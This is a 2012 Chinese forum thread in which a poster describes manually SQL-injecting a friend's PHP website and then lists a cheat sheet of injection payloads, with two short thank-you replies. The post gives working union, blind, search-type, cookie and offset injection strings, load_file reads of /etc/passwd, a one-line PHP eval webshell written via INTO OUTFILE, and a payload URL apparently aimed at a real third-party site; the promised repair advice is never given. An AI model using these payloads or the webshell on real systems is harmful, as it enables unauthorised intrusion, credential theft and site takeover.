找回密码
 立即注册
查看: 3825|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
' V2 t* u5 g" d2 X: f1 F/ U让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
$ @, a) X& n6 J; o我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
2 e9 s+ y" D: e9 G: R) u如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)7 G0 T! T# O' j9 v
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
( i7 D! c  k5 u' |  L- f这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:0 I8 O0 I4 s0 {3 S6 c! E
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
5 e* U' N$ Z; o, J8 c; ]/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入9 H# A9 U. a6 Z! D! n, B5 D
                        
. ^  a/ `7 B# c5 S) g4 {2 ]- m2 A2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,8 D6 s" O, ?! d# l
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意3 b0 E. g( l4 `$ S* @! D
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
+ p5 z+ c# g# H2 g8 K( E& n* {5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。" R( B9 {$ z6 O+ ?
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,+ u$ m& A) X( A
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
- E  |% z" a3 P3 e( [' ]( T我就用的是第二个思路,
6 q( V3 r& d2 Z3 d提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
( U$ w, |; @7 w' g$ x% B' z: a6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
5 O& r) k0 v3 o- M0 N) J提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
' i% E( k1 o4 {* W注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。+ ~. `5 [' V5 l, c+ B
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
+ h- w1 x3 j: k! o$ U是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd...... `1 N( C  \. h# H. J' n/ s* w! n2 O
提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
) ~7 r; t* f* f. E- |  S0 A6 z4 G4 `然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
4 `1 ^7 `5 h" n& A, _% N. W调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
" n) [& r( P4 t" o9 S下面是一些很普遍注入方式资料:0 t, ], F1 \3 y6 j
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='
6 M/ w) ~1 c5 z' i5 E* L拆半法
! B1 W8 T4 {- D######################################
: ?$ L* {8 r0 ~# O5 N) Z" band exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。9 }+ ]2 r/ ?. c. m: K
and exists (select * from admin)
( [* S% h( S: Iand exists(select id from admin)/ q5 v& }$ G; m; f1 M1 F. l+ l
and exists(select id from admin where id=1)
: z- A# i1 Z) f- p% V, d9 \) ?8 hand exists(select id from admin where id>1)
- o9 p' B# v* f5 g2 I然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 + P( h4 T" p7 [
and exists (select username from admin)0 J; ?0 m1 ]  X2 p% k! t1 J7 C
and exists (select password from admin)
. R, O' V0 ~1 j3 O' }and exists (select id from admin where len(username)<10 and id=1)1 N7 b* B. b: S0 [, I# P1 S/ ~# ~
and exists (select id from admin where len(username)>5 and id=1)
8 V- U. j+ Q2 Q/ Dand exists (select id from admin where len(username)=6 and id=1)
' N% U. I" O, h3 L3 \and exists (select id from admin where len(password)<10 and id=1)$ {7 b3 ?; b2 B% ?
and exists (select id from admin where len(password)>5 and id=1)
9 G0 l, `4 y% D" p$ M. m  ?and exists (select id from admin where len(password)=7 and id=1)
7 q6 d/ q9 h6 g$ _, w1 h+ Yand (select top 1 asc(mid(username,1,1)) from admin)=97
" y( J5 O4 o- U0 w! {" B返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。7 J" i) Z+ u6 R( P$ d2 m% }; I1 l! L. p
猜第二位把username,1,1改成username,2,1就可以了。- \# y, k) O( H, ]% g( H
猜密码把username改成password就OK了+ a5 P  P7 o! X+ m) z
##################################################
; i  v  ]+ T: T& |$ ~搜索型注入6 e1 M0 x* z% D; x, M" v
##################################
8 S7 r/ z! u) Z& y%' and 1=1 and '%'='4 n8 v: W( i, U& Q' M6 [
%' and exists (select * from admin) and '%'='
" f. o  d( Z% L. r%' and exists(select id from admin where id=1) and '%'='
* P" s8 j8 z7 ?2 n%' and exists (select id from admin where len(username)<10 and id=1) and '%'='# h  L- G% U9 H4 o- P! y
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
. w5 l3 q; o. O8 C" j; }: E) m%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
' z$ a- h% p/ ~, d这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='8 ?3 ?) T; x% k9 m0 q# A0 T! q; J
对于MSSQL数据库,后面可以吧 and '%'='换成--
5 m! G, @' c  }) Q- a. b0 d还有一点搜索型注入也可以使用union语句。' d& A, c- g* u1 ]8 b
########################################################1 J) B. `  N+ S4 h4 `
联合查询。
' e& \# e# I$ X9 K2 l  L, B#####################################9 \: _# |. x8 i# \1 p3 Y; V
order by 100 e9 C1 u% B! c
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
# [3 H. \! N. ]7 ^( v; ~$ zand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
: B9 Z, S" t- d3 xand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
% E3 ~! m8 x  T( T8 ~+ p3 ?+ }, I很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)" l( C- C% Q0 z4 P6 X
###################################
6 ]  o5 A1 F4 R; I% Icookie注入
* e, ^7 d" `) J) _! _###############################; v! n8 _5 i5 U- f6 h# E  b
http://www.******.com/shownews.asp?id=127
" d$ E' V$ O" w6 r* Mhttp://www.******.com/shownews.asp# V- @0 m# r, c* N8 m
alert(="id="+escape("127"));; w' e; l# K; P" G
alert(="id="+escape("127 and 1=1"));
. v# }* ]- U' P8 P( dalert(="id="+escape("127 order by 10"));
" U' s4 {5 x- Ralert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));" ^0 ~, T3 f0 P1 m6 j9 Y, d
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
, W# D6 Z" q; y7 N这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。7 `! D; I9 u1 E0 ]0 O/ A
###################################: Z+ F8 ~3 L! t" M$ _
偏移注入
4 c! l& I5 u, M. ~/ }8 g###########################################################, T; J6 L+ E7 T% o- ]; `
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin2 C% c8 A9 O3 e/ g1 r; X0 `. d* `
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
3 v8 k3 F6 k$ Y* Dunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id): r. |9 ^9 _" o( @
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
' ?3 T9 v7 }) x2 kunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
. ^3 g" }$ ~7 y1 L* m: H& `; `0 Junion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)' ]. j! L0 O/ K, m
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on0 r. `* ~7 V) `) q
a.id=d.id)
6 J/ x  }' H& q* Q3 b4 b4 j. x+ jand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)7 j/ [; x# x# J! p, J
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) * D" R4 x- w* q
  
8 w( s' {$ k: z0 ?; G============================================================================================================
4 p, T2 F  ?* R+ v( s1.判断版本1 W4 }! ]! x: V- h9 R
and ord(mid(version(),1,1))>51- c! j! ?0 U3 [
返回正常,说明大于4.0版本,支持ounion查询8 {2 }( F) G% ^# N
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解& T' D( R: i6 d3 a, C
and 2=4 union select 1,2,3,4,5,6,7,8,9--2 M% g" k( p# X6 M  B
3.查看数据库版本及当前用户,5 b8 n1 U5 r2 x  R0 G
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--2 O9 D$ |. V2 `2 g7 a. y
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,0 y; u# {+ ]' t- a( S5 a
4.判断有没有写权限$ z: l- s7 [+ A# \0 q
and (select count(*) from MySQL.user)>0-- , h0 D* X# r/ g0 m% L1 x
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
7 T7 S" n7 x, X6 k" a! S用不了这个命令,就学习土耳其黑客手法,如下3 [: w6 s# I& E# t5 F6 W
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--5 s$ a0 F6 x# h8 z
6.爆表,爆库
5 P2 R/ W  z# T1 Xand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
5 N+ h  V% h* k! O: r  p7 \7.爆列名,爆表+ h0 m6 L7 {" I0 Z6 V
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--, ^; K3 f7 G9 Q, e8 Y: m
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。* Y2 I9 Z( D) P& @  R
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
- x: b7 \0 w2 m/ V  V5 }1 o( O9.爆字段内容
3 T9 x5 o: `) ]* O- Nand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--9 E- s( W' a% a4 L) P% j- Q8 |2 o
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表